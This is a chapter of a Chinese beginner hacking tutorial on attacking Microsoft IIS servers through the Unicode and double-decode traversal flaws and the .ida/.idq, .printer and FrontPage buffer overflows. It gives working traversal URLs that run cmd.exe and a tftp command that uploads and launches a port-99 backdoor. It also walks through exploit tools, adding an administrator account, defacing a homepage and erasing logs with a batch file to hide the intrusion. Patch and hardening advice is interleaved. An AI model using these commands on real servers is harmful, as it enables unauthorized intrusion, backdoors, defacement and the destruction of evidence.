黑客入门全程图解(六)
http://X.X.X.X/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+c:\lucky.txt
之后,如果我们再次输入:
http://X.X.X.X/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\lucky.txt
对其进行查找,这时候,屏幕上将显示该文件已经找不到了。
3. copy文件的同时将该文件改名
输入如下命令,即可将主机上的lucky.txt改名为luck.txt:
http://X.X.X.X/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\lucky.txt luck.txt
4. COPY文件到另外的文件夹
输入如下命令,就可以将主机上的c:\lucky文件夹下的文件全部copy到c:\inetpub\wwwroot下了:http://X.X.X.X/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+xcopy c:\lucky c:\inetpub\wwwroot
5. 移动文件夹到指定的目录
要移动c:\lucky到c:\inetpub\wwwroot下,可以用下面的命令:
http://X.X.X.X/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+move c:\lucky c:\inetpub\wwwroot移动时间的长短就要看c:\lucky文件夹下的文件的数量及大小了。
6. 显示某一路径下相同文件类型的文件
下面的命令可以显示c:\inetpub\wwwroot\下所有扩展名前两个字符是“ht”的文件:
http://X.X.X.X/scripts/..%255c..%255cwinnt/system32/find.exe?/n+/v+""+c:\inetpub\wwwroot\ht*.*
7. 常被利用的attrib命令
attrib命令常被黑客利用,通过下面的例子你会感觉到它的功能有多么强大!如果我们想要了解该命令的一些用法,可以直接在DOS提示符下输入Attrib /?,然后直接回车就可以看到如图7-2-15所示的详细命令参数了。
图7-2-15 Attrib命令的用法
① 运行下面的命令,可以看到目标主机c:\inetpub\wwwroot下的index.htm文件的属性:
http://X.X.X.X/scripts/..%255c..%255cwinnt/system32/attrib.exe?c:\inetpub\wwwroot\index.htm
② 运行下面的命令,把目标主机c:\inetpub\wwwroot下的index.htm文件设为只读、隐藏属性:
http://X.X.X.X/scripts/..%255c..%255cwinnt/system32/attrib.exe?%20%2br%20%2bh%20c:\inetpub\wwwroot\index.htm
③ 运行下面的命令可以解除文件的属性:http://X.X.X.X/scripts/..%255c..%255cwinnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.htm
可能大家都注意到了,前面所介绍到的操作,文件名的长度没有超过8个英文字符的,是不是超过8个
字符的文件名无法输入呢?这样黑客就没有办法了吗?当然不是!对于长度超过8个字符的文件夹,比如想查看目标主机下Program Files文件夹里的内容时,就应该这样输入:http://X.X.X.X/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\progra~1
7.2.4 利用Unicode漏洞进一步控制主机
有了上面的基础,下一步要做的就是进一步控制该主机了!不过,尽管在前面已经可以做一些简单的操作了,但此时我们的权限很低,干不了什么事,那又该如何来进一步提升权限呢?聪明的你应该想到了吧,那就是使用木马来提升权限。给服务器上传一个木马,并用木马控制目标主机是黑客最常用的手段之一。
让我们来看一看是如何操作的:
① 首先需要准备如下文件:
tftpd32.exe和ncx99.exe
tftpd32是一个相当方便又简易的FTP程序,只要运行它就可以将你的电脑变成一台最简单的FTP
Server,也就是其他电脑可通过Internet以FTP方式下载你电脑中的任何文件,在这里,我们利用它将我们自己电脑中的文件复制到目标服务器中;而ncx99则是一个默认打开99端口的后门程序。
② 运行tftpd32.exe
这时我们的机器已经是一个FTP服务器了(控制主机行为开始……)。
③ 在我们IE浏览器地址栏里填入:
http://61.52.X.X/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp -i 127.0.0.1 GET ncx99.exec:\\inetpub\\scripts\\xr.exe
命令解释:
127.0.0.1为本机的IP;命令行中的c:\inetpub\scripts\为目标主机服务器目录,要看主机的具体情况而定。黑客输入上面这一行命令的目的是把ncx99.exe上传到目标主机,并改名为xr.exe(可能是其它名字,可以随意改的)。
注意,这里使用的是“\\”,而不是“\”。
④ 一般情况下要过大概3分钟左右,IE浏览器左下角会显示完成,红色漏斗消失,此时ncx99.exe已经上传到目标主机c:\inetpub\scripts\目录,并成功改名为xr.exe。
⑤ 再使用如下命令来执行xr.exe(即ncx99.exe文件)
http://61.52.X.X/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+c:\inetpub\scripts\xr.exe
暂时不要关闭浏览器,此时我们就可以telnet X.X.X.X了。
新打开一个命令提示符窗口,在其中输入:telnet 61.52.142.40 99,99为ncx99.exe默认端口。当出现登录成功信息时,表示已经取得了系统权限。
⑥以后就看该黑客怎么使用这台机器了,上传什么控制文件也由他决定。
7.2.5 Unicode漏洞解决方案
如果有人利用Unicode漏洞进入目标主机,并执行过Ftp命令,例如到某个Ftp站点下载过文件,都会在日志中被记录下来,不要以为他删除那个文件或给文件改名就可以逃脱入侵的证据了。在目标主机的winnt/sys-tem32/logfiles\msftpsvc1目录下,可以找到运行Ftp的日志,如果有人执行过Ftp命令,在日志文件里可以看到类似下面的记录(其中127.0.0.1为日志中记载的入侵者的IP):
11:49:19 127.0.0.1 [2]USER xiaorong 331
11:49:19 127.0.0.1 [2]PASS – 230
11:49:19 127.0.0.1 [2]sent /lucky.txt 226
11:49:19 127.0.0.1 [2]QUIT - 226
这样你就可以通过这个记录来发现他的IP,再来抓住他。
另外,在winnt\system32\logfiles\w3svc1\目录里保留有web访问记录,如果曾经被人利用Unicode漏洞访问过,可以在日志里看到类似下面的记录(其中127.0.0.1为日志中记载的入侵者的IP):11:36:18 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 401
11:36:18 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 200
如果有人曾经执行过copy、del、echo、bat等具有入侵行为的命令时,会有如下记录:
11:37:27 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 401
11:37:27 127.0.0.1 GET /scripts/..\../winnt/system32/cmd".exe 502
是不是一清二楚呢?不过狡猾的黑客(高手)还是会有其它应对方法的,但是经常查看日志文件,却是有百利而无一害哦!
只用上面的方法太被动了,还是主动些先解决了Unicode漏洞为好,下面为你提供了两种方案:
1.简单解决方案
① 限制网络用户访问和调用cmd的权限。
② 在Scripts、Msadc目录没必要使用的情况下,删除该文件夹或者改名。
③ 安装NT系统时不要使用默认WINNT路径,比如可以改名为lucky或者其他名字。
2.最好的解决办法
最好的方法当然是下载微软提供的补丁了。可以从如下地址下载补丁:
对于IIS 4.0到这里:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
对于IIS 5.0到这里:
http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
IIS在加载可执行CGI程序时,会进行两次解码。第一次解码是对CGI文件名进行Http解码,然后判断此
文件名是否为可执行文件,如检查后缀名是否为“.exe”或“.com”等。在文件名检查通过之后,IIS会进行第二次解码。正常情况下,应该只对该CGI的参数进行解码,然而,IIS有时会错误地将已经解过码的CGI文件名和CGI参数一起进行解码。这样,CGI文件名就被错误地解码两次。通过精心构造CGI文件名,攻击者可以绕过IIS对文件名所做的安全检查。在某些条件下,攻击者可以执行任意系统命令。
7.3.1 利用IIS错误解码漏洞进行攻击
对于“\”这个字符,正常编码后是%5c。这3个字符对应的编码为:
'%' = %25
'5' = %35
'c' = %63
如果要对这3个字符再做一次编码,就可以有多种形式,例如:
%255c
%%35c
%%35%63
%25%35%63
……
因此,“..\”就可以表示成“..%255c”或“..%%35c”等形式。
在经过第一次解码之后,变成“..%5c”。IIS会认为这是一个正常的字符串,不会违反安全规则检查。而在第二次被解码之后,就会变成“..\”。因此攻击者就可以使用“..\”来进行目录遍历,执行web目录之外的任意程序。
这是因为IIS只会过滤查看用户键入的地址栏是否有“\”或“%5c…”这些东西,但却不会查看自己编码后的内容,再加上它会对有%符号后面的两个数字进行编码,直到%符号不存在为止,因此利用IIS的这两项特性,我们可键入IIS不会阻挡的地址,而在编码后却有“\”存在地址中,如此就可以达到运行cmd.exe程序的目的。
例如,如果TARGET存在一个虚拟可执行目录(scripts),并且它与windows系统在同一驱动器上。那么提交类似下列请求:
http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
IIS就会首先将其编译成:
http://TARGET/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
然后再编译成:
http://TARGET/scripts/..\..\winnt/system32/cmd.exe?/c+dir+c:\
最后列出C:\的根目录。
当然,对于“/”做变换同样可以达到上面的效果。例如:将“%255c”换成“%%35%63”、“%25%35%63”等。
不过通过这种方式得到的权限视对方网管人员对IUSER_machinename用户的权限设置得高低而定,也就是说只能以IUSER_machinename用户的权限执行命令。与Unicode漏洞一样,利用IIS错误解码漏洞进入目标服务器后由于权限一般仅Guest,所以能做的事比较有限,但还是可以查看各文件夹中有哪些文件,查看纯文本文件内容,删除文件、复制文件、简易修改网页……等操作。
7.3.2 IIS错误解码漏洞的防范
既然是漏洞,微软当然有提供补丁程序来解决,大家可以到下列地址下载补丁。
.Windows 2000操作系统中IIS5.0的修补:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29764
Winnt操作系统中 IIS 4.0:的修补:http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787下载完成直接运行,依照提示操作,完成后重新启动计算机即可。
另外还需要注意如下的一些问题:
(1)如果不需要可执行的CGI,可以删除可执行虚拟目录,例如 /scripts等等。
(2)如果确实需要可执行的虚拟目录,建议将可执行虚拟目录单独放在一个分区
(3)将所有可被攻击者利用的命令行工具移到另外一个目录中并禁止GUEST组访问。
另外,微软还有一个跟我们前面所讲的Unicode漏洞和IIS错误解码漏洞类似的漏洞,叫CGI解译错误漏洞,也是对用户键入的地址判断错误而造成的,但是此漏洞并非默认就存在的,而是必须有几项因素都配合之后才会产生,因此想要利用此漏洞的几率很低,这里也就不作详细介绍了。
作为安装IIS过程的一部分,系统会安装几个ISAPI扩展.dlls文件,其中idq.dll是Index Server的一个组件,对管理员脚本和Internet数据查询提供支持。但是,idq.dll在一段处理URL输入的代码中存在一个未经检查的缓冲区,攻击者利用此漏洞能导致受影响服务器产生缓冲区溢出,从而执行自己提供的代码。更为严重的是,idq.dll是以System身份运行的,攻击者可以利用此漏洞取得系统管理员权限。
7.4.1 利用.ida/.idq缓冲区溢出漏洞攻击
1.扫描有.ida/.idq缓冲区溢出漏洞的IIS服务器
首先需要使用扫描工具找出哪些网站服务器或是你想要进入的目标服务器是否存在.ida/.idq缓冲区溢出漏洞,针对远程溢出漏洞,我们可以采用ofscan(即IIS Remote Overflow Exploit Scanner,IIS远程溢出漏洞扫描)软件,它是一个DOS命令行工具,其用法如图7-4-1所示。
图7-4-1 iis远程溢出漏洞扫描工具ofscan的用法
从图7-4-1中看出,可以使用ofscan工具扫描iis的多种远程溢出漏洞,除此之外,后面介绍的漏洞,也可以使用此工具进行扫描。
打开命令窗口,输入如下命令:ofscan /ida [Begin IP] [End IP],如图7-4-2所示。
这就是你想要的IIS服务器IP地址
图7-4-2 扫描指定IP段存在.ida溢出漏洞的网站
2. 利用软件进行攻击
找到了具有.ida/.idq缓冲区溢出漏洞的IIS服务器后,下面我们就可以利用攻击的工具造成溢出,这里以最经典的idahack工具为例进行介绍,这也是一个DOS命令行工具。
打开命令窗口,输入如下命令:
idahack <目标服务器IP> <hostport> <hosttype> <shellport>.
其中:hostport是指服务器端口,一般是80;
shellport是溢出后连接的端口,随意设置一个不常用的端口。
hosttype是Windows版本代码类型,其对应关系如下表:
其命令的具体操作如图7-4-3所示。
图7-4-3 使用idahack工具的操作命令 这里显示的是:无法溢出,失败。如果显示:
Now you can telnet to 98portGood luck:) 就表示溢出成功,你可以直接连接98端口
找到溢出成功的IP地址后,就可以使用telnet连接远程主机的98端口了,我们可以使用专门的连接工具NC,如图7-4-4所示。
图7-4-4 使用连接工具nc
NC即网络工具中有“瑞士军刀”美誉的NetCat,用户可以在网上搜寻红与黑重新设计编译制作的NC,身材缩减到了原来的1/5,仅10K,功能完全一样,运行更快,上传下载更方便!
如果使用idahack都可以成功,但是使用Telnet连接时却失败,则很可能是该服务器安装有防火墙,所以虽然溢出成功却无法连接,可能是所使用的端口被防火墙阻挡,这时可以换个端口再试试,有可能会成功。
ida/idq漏洞可以结合Unicode漏洞一起使用,将提升权限的小工具idq.dll上传到对方服务器中(这与索引服务的那个idq.dll不同,不要弄混了),然后再使用ispc.exe程序连接刚刚上传过去的idq.dll,从而提升权限,并在对方服务器中添加管理员用户。
7.4.2 .ida/.idq缓冲区溢出漏洞的防范
1.下载安装漏洞补丁
针对此漏洞,微软公司提供了相应的补丁,我们只要为IIS服务器打上相应的补丁,也就可以堵住.ida/.idq缓冲区溢出漏洞。
Windows NT 4.0:
下载:http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833
Windows 2000 Professional,Server and Advanced Server:
下载:http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800
另外,由于微软的SP3及SP3以上的补丁中已经包含此补丁程序,所以你可以直接到微软网站下载最新的SP4补丁程序:
http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp
2. 删除对 .idq 和 .ida 的脚本映射
在主机的管理工具中,打开Internet信息服务管理器,在左边的窗口中右键单击主机,并从弹出地菜单中选择“属性”,如图7-4-5所示。
图7-4-5 Internet信息服务
打开如图7-4-6所示的属性对话框中,在“主属性”下拉列表框中选择“WWW服务”,然后单击旁边的“编辑”按钮。
在弹出的“WWW服务主属性”对话框中,选择“主目录”选项卡,在“应用程序设置”区域中,单击“配置”按钮,如图7-4-7所示。
打开图7-4-8所示的“应用程序配置”对话框中,打开“应用程序映射”选项卡,可以看到其中有许多选项,将idq.dll和ida.dll等程序的映射全部删除掉,只保留.asp,.shtm,.shtml,.stm 4种格式文件的映射即可(因为大多数网站只用到这几种映射,其余的映射很少用到)。
如果确实需要这一类文件时,必须安装最新的系统修补补丁,并且选中相应的程序映射,再点击“编辑”按钮,在“添加/编辑应用程序扩展名映射”对话框中勾选“检查文件是否存在”选项,如图7-4-9所示。这样当客户请求这类文件时,IIS会先检查文件是否存在,文件存在后才会去调用程序映射中定义的动态链接库来解析。
图
7-4-6 属性对话框图7-4-7 WWW
服务主属性对话框
图7-4-8 删除无用的映射
图7-4-9 要求检查文件是否存在
由于IIS 5的打印ISAPI扩展接口建立了.printer扩展名到Msw3prt.dll的映射关系(缺省情况下该映射也存在),当远程用户提交对.printer的URL请求时,IIS 5.0会调用Msw3prt.dll解释该请求,加之Msw3prt.dll缺乏足够的缓冲区边界检查,远程用户可以提交一个精心构造的针对.printer的URL请求,其“Host:”域包含大约420B的数据,此时在Msw3prt.dll中发生典型的缓冲区溢出,潜在地允许执行任意代码。在溢出发生后,Web服务会停止用户响应,而Windows 2000将接着自动重启它,进而使得系统管理员很难检查到已发生的攻击。由于.printer溢出漏洞只存在于Windows 2000与Windows 2000+SP1环境中,而且许多服务器并不提供Internet打印功能而关闭了此服务,所以能够找到具有.printer溢出漏洞而且可以成功入侵的服务器非常少,成功率较低。
7.5.1 利用IIS5.0
的.printer溢出漏洞攻击
首
先
是
要寻找攻击的主
机,
可以通过对目标网段进行扫描,检查是否存在有该漏洞的主机。除了可以使用第7.4.1介绍的ofscan工具来扫描以外(使用命令:ofscan /pri 目标服务器IP),也可以使用X-scan扫描其IIS漏洞,然后再从其结果中找出.printer溢出漏洞的服务器。
具体操作步骤如下:
① 打开X-scan,出现如图7-5-1所示主窗口。
然后选择“设置”|“扫描模块”选项或单击按钮,这时候将出现如图7-5-2所示的“扫描模块”对话框。只保留IIS漏洞一项的选中,其它项全部去掉,然后确定。
② 再点选“设置”|“扫描参数”或者单击按钮,在弹出的“扫描参数”窗口中输入目标主机IP地址的扫描范围,然后选择设定线程数量,如图7-5-3所示。
图7-5-1 X-scan的主程序窗口图7-5-2 “扫描模块”窗口
图7-5-3 设置扫描参数
③ 最后单击“开始扫描”。这样,如果对方主机存在该漏洞,就会在命令行界面中出现“Found IIS re-mote .printer overflow bug!!!”的提示,如图7-5-4所示,这时就成功了一半。
图7-5-4 出现命令行提示
④ 接下来,要使用工具去利用这一漏洞,目前这方面的软件很多,在这里以iishack5.0的使用为例,其用法有点类似idahack,如图7-5-5所示。
我们直接输入命令:iis5hack 10.0.14.21 80 0 99对远程的目标服务器进行攻击,如图7-5-6所示。
⑤ 溢出成功,此时就可以使用命令:telnet
10.0.14.21 99登录到目标服务器了。这样,就得
到了远程的system权限,顺便做个后门,也检验一
下此时的权限,图7-5-7所示,即顺利地添加了一
个IUSRredpp用户,并把这个用户添加到了
adminstrator组。
⑥ 现在,我们已经完全能够控制这一台服务器
了。
⑦ 然后再来看看该服务器的主页放在哪个位
置,先登录主页,单击右键看看特殊图片的文件
名,然后通过dir c:\filename .gif /s来搜索
这个文件。如果C盘上没有,就到D盘,假设它的
主页放在d:\inetpub\wwwroot下,下面来黑掉它
(这里并不希望大家这样做,特别是在国内主机
上,千万不要做这种愚蠢而非法的事情。我们再次
重申本书所涉及内容仅供研究,不赞成非法使用
该技术!)
⑧ 在命令行状态下,进行如图7-5-8所示的操
作:
⑨ 现在再通过Web访问对方的网页,已经被更换成hacked by Eastdark
字样的网页了。图
7-5-5 iishack 的用法显示图7-5-6 使用iis5hack
进行攻击
图7-5-7 建立一个管理员用户
图7-5-8 更换目标服务器网页
聪明的人一定想到了:如果我们把木马、命令
行密码破解工具(通过重定向来得知密码)传过去,就
可以更方便的做事情了。
⑩ 现在,我们可以远程执行cmd.exe了,即telnet
获得输入端,现在可以做许多事情了,比如上传/下载
文件,也可以通过把cmd.exe复制到inetpub的
scripts目录下面做一个小后门,以后就可以通过IE
来执行命令了,如图7-5-9所示。
如此,利用IIS5.0的.printer
漏洞已完全攻陷了这台主机。另外,你也可以使用小榕的IIS5Exploit软件进行溢出攻击。
7.5.2 .printer
溢出漏洞的防范
只要远程主机存在.
printer漏洞,开启了80端口或是443
端口的Windows 2000操作系统,都可以采用第7.5.1节讲述的
方法进行攻击,所以非常危险。如果是我们来管理服务器,该
如何避免这一漏洞给服务器带来的危害呢?
由于此漏洞是由于以.printer为后缀的脚本会传送给
msw3prt.dll而产生的,因此删除.printer映射就能杜绝这个
漏洞,如第7.4.2节中所讲述的那样,在“控制面板”|“管理
工具”|“Internet服务管理器”|“Web站点属性”|“主目录”
|“配置”,找到.printer映射,如图7-5-10所示,然后删除
便可以了,但这样的操作会丧失网络打印的功能,不过总比被
人利用这漏洞入侵要好。
还可以到微软的网站下载相应的补丁程序,下载地址如下:
http://www.microsoft.com/Downloads/Release.asp?
ReleaseID=29321微软FrontPage2000服务器扩展软件包中带了一个动态链接库:fp30reg.dll,它存在一个缓冲区溢出漏洞。当向fp30reg.dll提交一个包含超过258字节的长URL请求时,将触发一个基于堆栈的缓冲区溢出。成功地利用这个漏洞,攻击者可以在被攻击的主机上远程执行任意代码。
如果fp30reg.dll收到一个它不理解的参数时,它会返回一个错误信息给请求者:
“The server is unable to perform the method [用户提供的参数] at this time”
这个错误信息被保存在堆栈中的一个缓冲区中。fp30reg.dll调用USER32.wsprintfA()来构造返回消息,由于没有检查用户输入数据的长度,攻击者可以重写某些重要的内存地址以改变程序流程,例如:异常结构或者保存的返回地址等。
USER32.wsprintfA()用到的格式串为:
<HEAD><TITLE>HTTP Error 501</TITLE></HEAD><BODY><H1>NOT IMPLEMENTED </H1>
The server is unable to perform the method <b>%s</b> at this time.</BODY>
图7-5-9 通过IE来执行命令
图7-5-10 删除.printer的映射
它也被保存在堆栈中,而且它的地址在(目标缓冲区地址+256字节)处,因此在溢出发生时,格式串会被重写,攻击者必须设法使拷贝顺利完成。
如果攻击者使用随机数据,可导致IIS停止响应。
对于IIS 5.0,IIS服务会自动重新启动。而对于IIS 4.0,需要手工重启服务。
成功地利用这个漏洞,在IIS 5.0中,攻击者可以获取IWAM_machinename用户的权限。在IIS 4.0中,攻击者可以获取Local System权限。
7.6.1 利用FrontPage 2000服务器扩展缓冲区溢出漏洞攻击
1.扫描有
FrontPage 2000服务器扩展缓冲区溢出漏洞的
IIS服务器
首先需要使用扫描工具找出哪些网站服务器或是想要进入的目标服务器是否有FrontPage 2000服务器扩展缓冲区溢出漏洞。针对这个漏洞,也可以采用第7.4.1节所介绍的ofscan(即IIS Remote Overflow ExploitScanner,IIS远程溢出漏洞扫描)软件来进行扫描。
打开命令窗口,输入如下命令:ofscan /fp2k [Begin IP][End IP],如图7-6-1所示。
图7-6-1 扫描指定IP段可能存在FrontPage 2000服务器扩展缓冲区溢出漏洞的网站
当扫描完成,就会在后面显示可能存在FrontPage 2000服务器扩展缓冲区溢出漏洞的网站的IP地址。2. 利用软件进行攻击
找到了具有FrontPage 2000服务器扩展缓冲区溢出漏洞的IIS服务器后,下面就可以利用攻击的工具造成溢出,这里以hackfp2k软件为例进行介绍,这也是一个DOS命令行工具。
进入代理跳板,运行cmd命令,进入Dos窗口中进行操作,输入如下命令:
hackfp2k [目标服务器IP] [host port] [shell option]
host port:服务器端口,不键入则默认80;
shell option:此选项决定采用何种入侵方式。1表示直接入侵,2表示使用Telnet入侵(通过端口23)。具体的操作如图7-6-2所示。
图7-6-2 使用hackfp2k软件进行溢出攻击
如果溢出攻击成功,则会显示:“溢出攻击成功!!请稍等…”的字样,稍候根据提示按下Enter键即可进
入目标服务器中。
7.6.2 FrontPage 2000
服务器扩展缓冲区溢出漏洞的防范由于
F
ron
t
P
ag
e
2000服务器扩展缓冲区溢出漏洞并不为大多数人所熟知,因此很多网管根本就不知它为何物,当然也就没有修补和防堵,从而给了黑客可乘之机。现在我们已经知道这个漏洞的危害性,该如何来防范呢?
1.下载安装漏洞补丁
在Windows 2000的SP3中已经包含了对此漏洞的修
补,所以可以检查一下网站服务器当前Windows 2000是
哪个版本,鼠标右击“我的电脑”|“属性”|“常规”,
如图7-6-3所示。
如果已经是SP3或是SP3以上的版本那就不用修补,
若没有显示任何Service Pack则是最早的Windows 2000
版本,可以直接到微软网站下载最新的SP4补丁:
http://www.microsoft.com/windows2000/downloads/
servicepacks/sp4/default.asp
另外,也可以到下列地址下载该漏洞的相应补丁程
序进行修补:
Microsoft Windows NT 4.0:
http://www.microsoft.com/Downloads/
Release.asp?ReleaseID=31038
Microsoft Windows 2000:
http://www.microsoft.com/Downloads/
Release.asp?ReleaseID=307272. 删除对应的文件
如果找补丁程序有困难,我们也可以
采用临时解决方法,就是删除或禁止任何
人访问fp30reg.dll和fp4areg.dll。这是
没有办法的办法,最好还是打上补丁将漏
洞堵住。
另外,对服务器的攻击还有拒绝
服务攻击即瘫痪攻击,让该网站永远(或是
暂时)无法提供各项网络服务(如无法浏
览),让网站服务器的主人遭受程度不同的
损失。我们同样可以利用Ofscan扫描到的
.idq/.ida、.printer、.asp等缓冲区溢出
漏洞和FrontPage Web页面处理漏洞进行拒
绝服务攻击,如图7-6-4所示使用iis_dos
工具进行拒绝服务攻击的使用方法。图7-6-3 查看当前补丁版本图7-6-4 使用iis_dos工具进行拒绝服务攻击
这就是补丁信息
后门做好了,千万不要以为万事大吉!大多数的服务器都有各种连接和使用的日志,只要对某个服务器进行入侵或攻击,多半都会被记录下来,其中最重要的信息就是你当时上网的IP地址(若是通过代理服务器或跳板电脑上网,则是代理服务器或跳板电脑的IP地址),因此,为了防止网管人员发现自己入侵的踪迹,在离开之前我们需要将这些日志全部清除掉,包括应用程序日志,安全日志、系统日志、WWW
日志等等。
特别强调,要想清除日志,必须要提升到具有系统管理员等级的权限才行。
1. 使用清理工具
我们可以使用专门清除IIS日志(log)的Cleaniislog和清除一般日志的Clearlogs这两个小工具来进行日志清理。
(1)上传Cleaniislog
在离开目标服务器之前开始进行清理工作,首先你必须要用具有系统管理员权限的账户先登录该服务器,然后将Cleaniislog.exe上传到该服务器中。
具体操作如图7-7-1所示。
图7-7-1 将Cleaniislog程序上传到目标服务器
(2)查看本机的IP地址
可以按照第1.1.3节中介绍的方法查看本机的IP地址,如果你是通过局域网中的某台电脑上网,则是要获取对外连接的IP地址,而不是你自己这台电脑局域网内的IP地址,在有些黑客网站或是某些论坛,都会显示出本机对外连接的IP地址,如图7-7-2所示,如果确实找不到,可以问你们的系统管理员。
图7-7-2 查看对外连接的IP
地址
被涂抹的地方后面是用户的密
码,以系统管理账户身份登录目标服务器
将对方C盘映射为本机的M盘
将cleaniislog.exe复制过去
这就是你对外连接的IP地址
(3)清理IIS日志
同样可以利用at命令来运行上传到目标服务器的Cleaniislog.exe程序,操作如图7-7-3所示。
图7-7-3 用计划任务清理iis日志
这样,在IIS日志中有关你上网IP记录的清理就大功告成了。
(4)清理系统、安全与程序日志
可以直接利用clearlogs工具来删除目标服务器的日志,由于该程序可以直接进行远程清理,所以不需要将此程序上传到目标服务器中运行,利用它可以清理Windows的一般日志,包括系统日志(System log)、安全日志(Security Log)与程序运行日志(Applications Log)。
清理应用程序日志的命令如图7-7-4所示。
图7-7-4 清理应用程序日志操作
清理安全日志的命令如图7-7-5所示.。
图7-7-5 清理安全日志操作
清理系统日志的命令如图7-7-6所示.
图7-7-6 清理系统日志操作
就这样轻轻松松地将自己入侵的日志清除干净了,不必一个个去辛苦查找各项日志文件的存放位置后再清除,这两个小工具自动帮我们完成了这些繁琐的事情。
这两个工具只能删除默认文件夹中的日志文件,一旦目标服务器的网管人员将日志文件位置改到其他文件夹中,则这两个工具就不能清除。
2. 手工清理日志
已经设有任务计划,表示已被执行删除cleaniislog.exe
查看对方电脑时间为10:22
设置对方电脑10:24运行cleaniislog.exe,
清楚本机的IP地址记录
若是网管人员将日志文件放置的位置更改到其他文件夹或是其他监控程序的日志文件,就要靠我们手工去查找了,这种方式仍然需要我们有系统管理员权限登录到目标服务器中,然后将Windows系统所在的磁盘映射到本地,然后才可以进行各项清理工作。
(1)清理WWW日志
WEB Server日志文件默认存放在Windows系统文件夹下的\system32\logfiles\w3svc?(?表示数字)文件夹中,(例如C:\winnt\ system32\logfiles\w3svc1),默认每天产生一个日志文件(log file),你可以找到最新产生的日志文件,然后将其中包含你现在上网IP地址的日志都删除,可将该文件先复制到你的硬盘中,使用记事本打开清理后再拷贝回目标服务器中
。
当然你也可以使用最简单的方法:将ex*.log全部删除,不过若网管人员查看就很容易被发现有黑客入侵
过(虽然不一定能找出是谁),已造成打草惊蛇的结果,或者将你辛苦建立的后门给毁掉了,你岂不是白辛苦一场?
(2)清理FTP日志
FTP服务日志文件默认存放在Windows系统文件夹下的System32\logfiles\msftpsvc?(?表示数字)文件夹中(例如C:\Winnt\System32\logfiles\msftpsvc1),默认每天产生一个日志文件,你同样可以采用清理WWW日志相同的方法进行清理。
(3)清理安全日志、系统日志与应用程序日志
这是Winnt、Windows 2000本身就有的日志, 这些日志文件默认是保存在Windows系统所在文件夹下的System32\config文件夹中(例如c:\winnt\system32\config),文件名分别为SecEvent.evt、SysEvent.evt、AppEvent.evt,不过这些文件并不是单纯的文本文件,无法用记事本打开查看,但是我们可以采用如下的方法来清除。
打开“控制面板”|“管理工具”|“事件查
看器”,在“事件查看器”窗口中,选择“操作”
|“连接到另一台计算机”,在弹出的对话框中输
入要连接计算机的IP地址,如图7-7-7所示。
连接之后,直接用鼠标右键单击相应的日
志,如图7-7-8所示,选择“清除所有事件”,然
后在弹出的对话框中选择“否”(即清除之前不保
存),即可轻松将相应的日志清除。图7-7-8 清除目标服务器的日志
(4)清除计划任务日志(Scheduler log)
计划任务日志是任务计划(Scheduler)所产生的日志文件,默认是存放在Windows
系统所在的文件夹中,
图7-7-7 输入另一台计算机的IP
地址
(例如C:\winnt),名称为schedlgu.txt(Windows 2000系统)或Schedlog.txt(Winnt系统),如果在实施黑客入侵的过程中使用了at命令就必须要对它进行清理(反之则不用清理)。
由于这个日志文件是由任务计划管理,而任务计划是以系统服务(Service)的方式运行,因此必须先将任务计划停止,才能对Schedlgu.txt(或Schedlog.txt)文件进行清理,由于很少有网管人员会查看任务计划日志(甚至没使用任务计划),因此你可以将Schedlgu.txt(或Schedlog.txt)全部删除。
那么要如何才能让任务计划器停止呢?当然还是用at命令,先制作一个批处理文件Cleanat.bat,内容如下:@echo off; 不让Dos窗口显示任何信息
net stop“task scheduler”>NULL;关
闭任务计划服务
del %Systemroot%\schedlgu.txt>NULL;
删除任务计划日志,若目标服务器为Winnt,
则这里要改为Schedlog.txt。
先将这个批处理文件复制到目标服务器
的C:\中,然后使用at命令设置两分钟后运
行它,然后删除Cleanat.bat(避免网管人员
看到引起怀疑),为了避免有残留的
Schedlgu.txt(或Schedlog.txt),所以还需
要最后删除一次,具体操作如图7-7-9所示。
虽然IIS有很多漏洞,而且新的安全漏洞还在不断被发现。但是只要我们打上最新的补丁,再对IIS进行精心安全配置,仍然能使自己的IIS服务器成为一个高安全性的Web服务器的。
7.8.1 构造一个安全的Windows 2000操作系统
要创建一个安全可靠的Web服务器,必须要实现“地面部分”──Windows 2000操作系统和“空中部分”──IIS的双重安全,因为IIS的用户同时也是Windows 2000的用户,并且IIS目录的权限依赖Windows的
NTFS文件系统的权限控制,所以保护IIS安全的第一步就是确保Windows 2000操作系统的安全。实际上,Web服务器的安全的根本就是保障操作系统的安全,没有一个安全的操作系统,Web服务器的安全根本无从说起。
1.使用NTFS文件系统
在NT系统中应该使用NTFS系统,NTFS可以对文件和目录进行管理,而FAT文件系统只能提供共享级的安全,而且在默认情况下,每建立一个新的共享,所有的用户就都能看到,这样不利于系统的安全性。而在NTFS文件下,建立新共享后可以通过修改权限保证系统安全。
2.关闭默认共享
在Windows 2000中,有一个“默认共享”,这是在安装服务器的时候,把系统安装分区自动进行共享,虽然对其访问还需要超级用户的密码,但这是潜在的安全隐患,从服务器的安全考虑,最好关闭这个“默认共享”,以保证系统安全。方法是:单击“开始/运行”,在运行窗口中输入“Regedit”,打开注册表编辑器,展开“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters”项,添加键值AutoShareServer,类型为REG_DWORD,值为0。 这样就可以彻底关闭“默认共享”。
图7-7-9 清除任务计划日志
